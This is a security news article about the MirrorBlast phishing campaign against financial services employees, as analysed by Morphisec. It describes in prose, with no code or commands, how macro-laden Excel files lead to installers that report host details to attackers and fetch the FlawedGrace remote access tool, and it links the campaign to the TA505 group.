Employees in the financial services sector are targeted by a new phishing campaign. It uses links to download a ‘weaponized’ Excel sheet. ET Labs, a security firm, discovered the phishing operation and nicknamed it MirrorBlast.
Morphisec, another security firm, has now analyzed the malware and concluded that the nefarious Excel files can evade malware detection systems because they contain “extremely lightweight” embedded macros. They make files “particularly dangerous” for organizations that rely on detection-based security and sandboxing.
Macros, which are programs that automate activities, have become a popular tool for cybercriminals. Although macros are disabled by default in Excel, attackers employ social engineering to persuade potential victims to enable them.
Macros, although appearing to be a simple approach, have been employed by state-sponsored hackers because they usually bring results. Microsoft, earlier this year, extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a new tendency among attackers to evade anti-malware systems by using outdated Excel 4.0 XLM macros (rather than newer VBA macros).
According to Morphisec, the attack chain in MirrorBlast is similar to tactics employed by TA505, a famous and financially motivated Russia-based cybercriminal gang followed by experts.
According to Morphisec analyst Arnold Osipov, TA505 is most known for regularly altering the malware they employ and driving worldwide malware dissemination patterns.
The MirrorBlast attack begins with a document attached to an email and progresses to a Google feedproxy URL with a SharePoint and OneDrive bait masquerading as a file transfer request. When you visit the URL, you’ll be sent to a hacked SharePoint site or a phony OneDrive site. The malicious Excel document may be present in both versions.
The attackers are using the theme of company-issued data on COVID-related alterations to employment patterns in the sample MirrorBlast email.
Due to ActiveX object compatibility issues, Morphisec states that the macro code can only be run on 32-bit Office. The macro itself runs JavaScript to avoid sandboxing. It checks whether the computer is running in administrator mode. The msiexec.exe process is then launched, which downloads and installs an MSI package.
Morphisec discovered two MIS installation versions that made use of legal scripting tools called KiXtart and REBOL.
The KiXtart script transmits the domain, user name, computer name, and process list of the victim’s machine to the attacker’s command and control server. It then answers with a number indicating whether the REBOL version should be used.
The REBOL script, according to Morphisec, connects to a remote access tool called FlawedGrace, which the organization has previously used.